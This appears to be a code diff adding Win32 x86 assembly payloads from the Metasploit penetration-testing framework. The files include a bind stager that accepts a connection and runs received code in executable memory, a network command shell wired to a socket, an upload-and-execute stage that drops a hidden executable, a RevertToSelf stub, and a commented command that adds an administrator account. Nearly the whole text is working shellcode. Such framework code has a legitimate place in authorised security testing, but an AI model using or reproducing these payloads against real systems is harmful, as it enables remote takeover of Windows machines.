+    mov edi, ebx        ; store base of data section in edi
+    mov ebx, eax        ; store base of winsock in ebx
+    lea esi, [ebp + 20] ; store base of function table
+    push byte 0x05      ; load five functions by hash
+    pop ecx             ; configure the counter
+
+Looper:    
+    push ecx                    ; save the counter
+    push ebx                    ; dll handle
+    push dword [edi + ecx * 4]  ; function hash value
+    call [ebp + 4]              ; find the address
+    pop ecx                     ; restore the counter
+    mov [esi + ecx * 4], eax    ; stack segment to store addresses
+    loop Looper
+
+LWSAStartup:                    ; WSAStartup (0x101, DATA)
+    sub esp, [edi]
+	push esp
+	push dword [edi]
+	call FN_WSASTART
+    xor eax, eax
+    
+LWSASocketA:                    ; WSASocketA (2,2,0,0,0,0) 
+	push eax
+	push eax
+	push eax
+	push eax
+    inc eax
+    inc eax
+    push eax
+    push eax
+	call FN_WSASOCK
+    mov edi, eax
@@ -0,0 +1,32 @@
+
+;  Platforms:  Windows NT 4.0, Windows 2000, Windows XP, Windows 2003
+;     Author:  hdm[at]metasploit.com
+
+
+[BITS 32]
+
+LFindGetProcAddress:
+    push dword [ebp] ; kernel32.dll
+    push 0x7c0dfcaa  ; GetProcAddress
+    call [ebp + 4]
+
+LSend: ; send(s, data, len, flags);
+    push eax              ; GetProcAddress
+    push dword [ebp + 8]  ; LoadLibraryA
+    mov ecx, esp
+    push byte 0x00          ; flags
+    push byte 8             ; length
+    push ecx                ; buffer
+    push edi                ; socket
+    call FN_SEND            ; send()
+
+
+LRecvLength: ; recv(s, buff, 4, 0)
+    sub esp, 4096
+    mov ebx, esp
+    push byte 0x00          ; flags
+    push 4096               ; length
+    push ebx                ; buffer
+    push dword edi          ; socket
+    call FN_RECV            ; recv()
+    call ebx
@@ -0,0 +1,19 @@
+;      Title:  Win32 RevertToSelf Stub
+;  Platforms:  Windows NT 4.0, Windows 2000, Windows XP, Windows 2003
+;     Author:  hdm[at]metasploit.com
+
+
+
+[BITS 32]
+
+call LLoadAdvapi
+
+LAVDataSegment:
+db "ADVAPI32", 0x00
+
+LLoadAdvapi
+    call [ebp + 8]  ; call LoadLibraryA("ADVAPI32.DLL")     
+    push eax        ; Module base 
+    push 0x50dec82a ; RevertToSelf
+    call [ebp + 4]  ; Find address
+    call eax        ; Call it
@@ -0,0 +1,78 @@
+;      Title:  Win32 Network Shell
+;  Platforms:  Windows NT 4.0, Windows 2000, Windows XP, Windows 2003
+;     Author:  hdm[at]metasploit.com
+
+[BITS 32]
+
+
+; [ebp +  0] = kernel32.dll base
+; [ebp +  4] = LGetProcAddress
+; [ebp +  8] = LoadLibraryA
+; edi        = socket
+
+LSetCommand:
+    push "CMD"
+    mov ebx, esp
+        
+LCreateProcessStructs:
+    xchg edi, edx       ; save edi to edx
+    xor eax,eax         ; overwrite with null
+    lea edi, [esp-84]   ; struct sizes
+    push byte 21        ; 21 * 4 = 84
+    pop ecx             ; set counter
+    
+LBZero:
+	rep stosd           ; overwrite with null
+    xchg edi, edx       ; restore edi
+    
+LCreateStructs:
+	sub esp, 84
+    mov byte [esp + 16], 68	    ; si.cb = sizeof(si) 
+	mov word [esp + 60], 0x0101 ; si.dwflags
+    
+	; socket handles 
+	mov [esp + 16 + 56], edi
+	mov [esp + 16 + 60], edi
+	mov [esp + 16 + 64], edi
+
+	lea eax, [esp + 16]	; si 
+	push esp			; pi 
+	push eax
+	push ecx
+	push ecx
+	push ecx
+    
+    inc ecx
+	push ecx
+    dec ecx
+    
+	push ecx
+	push ecx
+	push ebx
+	push ecx
+
+LCreateProcessA:
+    push dword [ebp] ; kernel32.dll
+    push 0x16b3fe72  ; CreateProcessA
+    call [ebp + 4]
+    call eax
+	mov esi, esp
+    
+LWaitForSingleObject:
+    push dword [ebp] ; kernel32.dll
+    push 0xce05d9ad  ; WaitForSingleObject
+    call [ebp + 4]
+    mov ebx, eax
+    
+    push 0xFFFFFFFF
+    push dword [esi]
+    call ebx
+    
+LDeathBecomesYou:
+    push dword [ebp] ; kernel32.dll
+    push 0x73e2d87e  ; ExitProcess
+    call [ebp + 4]
+    
+    xor ebx, ebx
+    push ebx
+    call eax
@@ -0,0 +1,174 @@
+;      Title:  Win32 Network Shell
+;  Platforms:  Windows NT 4.0, Windows 2000, Windows XP, Windows 2003
+;     Author:  hdm[at]metasploit.com
+
+[BITS 32]
+
+%ifndef FN_RECV
+    %define FN_RECV     [ebp + 24]
+%endif
+
+%define BLOCKSZ 32
+
+
+; [ebp +  0] = kernel32.dll base
+; [ebp +  4] = LGetProcAddress
+; [ebp +  8] = LoadLibraryA
+; edi        = socket
+
+
+; ebx       = handle of temp file
+; esi       = bytes left to read
+; [ebp+100] = CreateFileA
+; [ebp+104] = WriteFile
+; [ebp+108] = CloseHandle
+; [ebp+112] = file name
+; [ebp+116] = recv buffer
+; [ebp+120] = remaining bytes
+; [ebp+124] = storage space
+
+ 
+LLoadFileAPI:  
+    push dword [ebp]
+    push 0x7c0017a5         ; CreateFileA
+    call [ebp + 4]
+    mov [ebp+100], eax
+    push dword [ebp]
+    push 0xe80a791f         ; WriteFile
+    call [ebp + 4]
+    mov [ebp+104], eax    
+    push dword [ebp]
+    push 0x0ffd97fb         ; CloseHandle
+    call [ebp + 4]
+    mov [ebp+108], eax    
+
+LReadFileLength: ; recv(s, buff, 4, 0)
+    lea eax, [ebp+120]
+    push byte 0x00          ; flags
+    push 4                  ; length
+    push eax                ; buffer
+    push dword edi          ; socket
+    call FN_RECV            ; recv()
+    mov eax, [ebp+120]      ; remaining bytes
+    
+    call LGetFileName       ; get ptr to file name
+
+; temporary file name
+db "C:\metasploit.exe", 0x00
+
+LGetFileName:
+    pop ecx
+    mov [ebp+112], ecx
+
+LCreateFile:
+
+    push byte 0     ; template
+    push byte 6     ; FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_SYSTEM
+    push byte 4     ; OPEN_ALWAYS
+    push byte 0     ; lpSecurityAttributes=null
+    push byte 7     ; FILE_SHARE_DELETE | FILE_SHARE_READ | FILE_SHARE_WRITE;
+    push 0xe0000000 ; GENERIC_EXECUTE | GENERIC_READ | GENERIC_WRITE
+    push ecx        ; file name
+    call [ebp+100]
+    mov ebx, eax     ; Handle in ebx
+
+LConfigBuffer:
+ ;   lea eax, [esp-BLOCKSZ-200] ; leave some room
+    sub esp, BLOCKSZ - 200
+
+;  shr eax, 2
+;  shl eax, 2
+    mov [ebp+116], esp  ; store it away
+    
+LReadSocket: ; recv(s, buff, 4096, 0)
+    mov eax, [ebp+116]      ; recv buffer ptr
+    push byte 0x00          ; flags
+    push BLOCKSZ            ; length
+    push eax                ; buffer
+    push dword edi          ; socket
+    call FN_RECV            ; recv()
+    mov ecx, [ebp+120]      ; remaining bytes
+    sub ecx, eax            ; subtract recv
+    mov [ebp+120], ecx      ; put it back
+
+LWriteFile:
+    push esp                ; create storage
+    mov ecx, esp            ; get storage space
+    push byte 0             ; not overlapped
+    push ecx                ; &written
+    push eax                ; recv len
+    push dword [ebp+116]    ; source buffer
+    push ebx                ; file handle
+    call [ebp+104]          ; WriteFile
+    pop ecx                 ; remove storage
+
+    mov eax, [ebp+120]      ; remaining bytes
+    test eax, eax           ; are we at zero?
+    jnz LReadSocket         ; go read some more
+
+LCloseHandle:
+    push ebx
+    call [ebp+108]
+
+LCreateProcessStructs:
+    xchg edi, edx       ; save edi to edx
+    xor eax,eax         ; overwrite with null
+    lea edi, [esp-84]   ; struct sizes
+    push byte 21        ; 21 * 4 = 84
+    pop ecx             ; set counter
+    
+LBZero:
+	rep stosd           ; overwrite with null
+    xchg edi, edx       ; restore edi
+    
+LCreateStructs:
+	sub esp, 84
+    mov byte [esp + 16], 68	    ; si.cb = sizeof(si) 
+	mov word [esp + 60], 0x0101 ; si.dwflags
+    
+	; socket handles 
+	mov [esp + 16 + 56], edi
+	mov [esp + 16 + 60], edi
+	mov [esp + 16 + 64], edi
+
+	lea eax, [esp + 16]	; si 
+	push esp			; pi 
+	push eax
+	push ecx
+	push ecx
+	push ecx
+    
+    inc ecx
+	push ecx
+    dec ecx
+    
+	push ecx
+	push ecx
+	push dword [ebp+112]
+	push ecx
+
+LCreateProcessA:
+    push dword [ebp] ; kernel32.dll
+    push 0x16b3fe72  ; CreateProcessA
+    call [ebp + 4]
+    call eax
+	mov esi, esp
+    
+LWaitForSingleObject:
+    push dword [ebp] ; kernel32.dll
+    push 0xce05d9ad  ; WaitForSingleObject
+    call [ebp + 4]
+    mov ebx, eax
+    
+    push 0xFFFFFFFF
+    push dword [esi]
+    call ebx
+    
+LDeathBecomesYou:
+    push dword [ebp] ; kernel32.dll
+    push 0x73e2d87e  ; ExitProcess
+    call [ebp + 4]
+    
+    xor ebx, ebx
+    push ebx
+    call eax
@@ -0,0 +1,34 @@
+;      Title:  Win32 Socket Initialization
+;  Platforms:  Windows NT 4.0, Windows 2000, Windows XP, Windows 2003
+;     Author:  hdm[at]metasploit.com
+
+
+[BITS 32]
+
+%include "win32_stage_api.asm"
+
+jmp short GetCMD
+
+WinExec:
+    push ebx
+    push 0x0e8afe98
+    call esi
+    call eax
+
+
+ExitProcess:
+    push ebx
+    push 0x73e2d87e
+    call esi
+    push byte 0
+    call eax
+    call eax
+
+
+GetCMD:
+    push byte 0 ; last arg of WinExec
+    call WinExec
+
+; The command to execute
+;db "cmd.exe /c net user X X /ADD && net localgroups Administrators X /ADD"
+;db 0x00
@@ -0,0 +1,230 @@
+;      Title:  Windows Bind Stager (NX, IPv6)
+;  Platforms:  Windows NT 4.0, Windows 2000, Windows XP, Windows 2003
+;     Author:  Metasploit LLC
+
+[BITS 32]
+
+global _start
+_start:
+
+    call LKernel32Base
+
+LGetProcAddress:
+	push ebx
+	push ebp
+	push esi
+	push edi
+	mov ebp, [esp + 24]			
+	mov eax, [ebp + 0x3c]		
+	mov edx, [ebp + eax + 120]
+	add edx, ebp				
+	mov ecx, [edx + 24]			
+	mov ebx, [edx + 32]
+	add ebx, ebp
+
+LFnlp:
+	jecxz	LNtfnd
+	dec ecx
+	mov esi, [ebx + ecx * 4]
+	add esi, ebp				
+	xor edi, edi
+	cld
+
+LHshlp:
+	xor eax, eax
+	lodsb
+	cmp al, ah
+	je LFnd
+	ror edi, 13
+	add edi, eax
+	jmp short LHshlp
+
+LFnd:	
+	cmp edi, [esp + 20]
+	jnz LFnlp
+	mov ebx, [edx + 36]			
+	add ebx, ebp
+	mov cx, [ebx + 2 * ecx]		
+	mov ebx, [edx + 28]			
+	add ebx, ebp
+	mov eax, [ebx + 4 * ecx]	
+	add eax, ebp
+	jmp short LDone
+
+LNtfnd:
+	xor eax, eax
+
+LDone:
+	pop edi
+	pop esi
+	pop ebp
+	pop ebx
+	ret 8
+
+LKernel32Base:
+    pop esi
+    push byte 0x30
+    pop ecx
+    mov ebx, [fs:ecx]
+    mov ebx, [ebx + 0x0c] 
+    mov ebx, [ebx + 0x1c] 
+    mov ebx, [ebx]		  
+    mov ebx, [ebx + 0x08]
+
+    push ebx                ; kernel32.dll base
+    push dword 0xec0e4e8e   ; LoadLibraryA
+    call esi                ; GetProcAddress(kerne32.dll, LoadLibrary)
+    mov edi, eax
+	
+    push ebx                ; kernel32.dll base
+    push dword 0x91afca54   ; VirtualAlloc
+    call esi                ; GetProcAddress(kerne32.dll, VirtualAlloc)
+   
+    ; ebx = kernel32.dll base
+    ; esi = LGetProcAddress
+    ; edi = LoadLibraryA
+    ; eax = VirtualAlloc
+
+sub esp, 0x100
+push eax    ; [ebp + 12] = VirtualAlloc
+push edi    ; [ebp +  8] = LoadLibraryA
+push esi    ; [ebp +  4] = LGetProcAddress
+push ebx    ; [ebp +  0] = kernel32.dll base
+            
+mov ebp, esp
+call LLoadWinsock
+
+%define FN_RECV     [ebp + 24]
+%define FN_SEND     [ebp + 28]
+%define FN_ACCEPT   [ebp + 32]
+%define FN_BIND     [ebp + 36]
+%define FN_LISTEN   [ebp + 40]
+%define FN_WSASOCK  [ebp + 44]
+%define FN_WSASTART [ebp + 48]
+
+LWSDataSegment:
+;========================
+dd 0x190      ; used by wsastartup
+dd 0xe71819b6 ; recv        [ebp + 24]
+dd 0xe97019a4 ; send        [ebp + 28]
+dd 0x498649e5 ; accept      [ebp + 32]
+dd 0xc7701aa4 ; bind        [ebp + 36]
+dd 0xe92eada4 ; listen      [ebp + 40]
+dd 0xadf509d9 ; WSASocketA  [ebp + 44]
+dd 0x3bfcedcb ; WSAStartup  [ebp + 48]
+db "WS2_32", 0x00
+;========================
+
+LLoadWinsock:
+    pop ebx             ; save address to data in ebx
+    lea ecx, [ebx + 32] ; find address of "WS2_32.DLL"
+    push ecx            ; push address of "WS2_32.DLL"
+    call edi            ; call LoadLibraryA("WS2_32.DLL")     
+    mov edi, ebx        ; store base of data section in edi
+    mov ebx, eax        ; store base of winsock in ebx
+    lea esi, [ebp + 20] ; store base of function table
+    push byte 0x07      ; load five functions by hash
+    pop ecx             ; configure the counter
+
+Looper:    
+    push ecx                    ; save the counter
+    push ebx                    ; dll handle
+    push dword [edi + ecx * 4]  ; function hash value
+    call [ebp + 4]              ; find the address
+    pop ecx                     ; restore the counter
+    mov [esi + ecx * 4], eax    ; stack segment to store addresses
+    loop Looper
+
+LWSAStartup:                    ; WSAStartup (0x0202, DATA)
+	sub esp, [edi]
+	push esp
+	push dword 0x0202
+	call FN_WSASTART
+	xor eax, eax
+    
+LWSASocketA:                    ; WSASocketA (23,1,6,0,0,0)
+	; dwFlags
+	push eax
+
+	; RESERVED
+	push eax
+	
+	; PROTOCOL INFO
+	push eax
+	
+	; PROTOCOL: IPPROTO_TCP
+	push byte 6
+	
+	; TYPE: SOCK_STREAM
+	push byte 1
+
+	; FAMILY: AF_INET6
+	push byte 23
+	
+	; WSASocket()
+	call FN_WSASOCK
+	mov edi, eax
+
+LBind:
+
+	; sin6_scope_id
+	push dword 0x00000000
+	xor ecx, ecx
+		
+	; sin6_addr = ::0
+	push ecx
+	push ecx
+	push ecx
+	push ecx
+	
+	; sin6_flowinfo
+	push ecx
+	
+	; sin6_port / sin6_family
+	push dword 0xffff0017
+
+    mov ecx, esp
+
+    push byte 28        ; length
+    push ecx
+    push edi
+    call FN_BIND
+
+    xor ebx, ebx
+	
+LListen:
+    push ebx
+    push edi
+    call FN_LISTEN
+
+LAccept:
+    push ebx
+    push ebx 
+    push edi
+    call FN_ACCEPT
+    mov edi, eax
+
+LAllocateMemory: ; VirtualAlloc(NULL,size,MEM_COMMIT,PAGE_EXECUTE_READWRITE)
+
+	push byte      0x40
+	pop esi
+	push esi                ; PAGE_EXECUTE_READWRITE=0x40
+
+	shl esi, 6              ; MEM_COMMIT=0x1000
+	push esi
+
+	shl esi, 8              ; 1MB
+	push esi
+	
+	push byte      0x00     ; NULL
+	call [ebp+12]
+	mov ebx, eax
+	
+
+LRecvLength: ; recv(s, buff, 4, 0)
+    push byte 0x00          ; flags
+    push dword 4096         ; length
+    push ebx                ; buffer
+    push dword edi          ; socket
+    call FN_RECV            ; recv()
+    call ebx